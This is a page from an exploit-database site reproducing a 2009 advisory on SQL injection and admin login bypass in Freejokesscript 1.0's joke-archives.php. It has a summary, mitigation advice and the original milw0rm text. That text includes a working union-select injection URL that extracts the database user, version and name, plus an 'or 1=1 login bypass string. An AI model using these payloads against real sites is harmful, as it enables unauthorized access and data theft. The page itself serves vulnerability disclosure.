header-logo
Suggest Exploit
vendor:
Freejokesscript
by:
MuhaciR
7.5
CVSS
HIGH
SQL Injection & Admin Bypass
89
CWE
Product Name: Freejokesscript
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:evernewscripts:freejokesscript
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

freejokesscript = 1.0 (joke-archives.php) remote sql injection vulnerability & admin bypass vulnerability

A vulnerability exists in freejokesscript = 1.0 (joke-archives.php) which allows an attacker to inject malicious SQL commands and bypass the admin authentication. The vulnerability is due to insufficient sanitization of user-supplied input in the 'cat_name' and 'cat_id' parameters of the 'joke-archives.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable script. Successful exploitation could result in unauthorized access to the application, disclosure of sensitive information, and other attacks.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to generate SQL commands that are executed. Additionally, authentication credentials should not be stored in plaintext.
Source

Exploit-DB raw data:

# freejokesscript = 1.0 (joke-archives.php) remote sql injection vulnerability & admin bypass vulnerability 

# info : found at semi sexy mode, when i was searching jokes script for my own site. if u have any please help :(. i didnt sit and search them like others so dont kick me hard :)

# author : MuhaciR aka гламурный подонок

# source : http://www.evernewscripts.com/?p=3

# license price : $20 per copy

# sql: http://www.victim.com/[jokes path if any]/joke-archives.php?cat_name=muhacir&cat_id=15+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5/*

# admin bypas: simply enter 'or 1=1/* at login. no filtration

# greetz goes : 

	-me
	
	-my love, ok a little to turkmen girlz too :)

	-friends: arassa_turkmen, bezzat, mc_merw, baamcik, dmry ;)

	-and ofcourse str0ke for running this site

P.S:i wholeheartedly celebrate your valentines day and wish you to love, be loved, success and ferrari

# milw0rm.com [2009-02-12]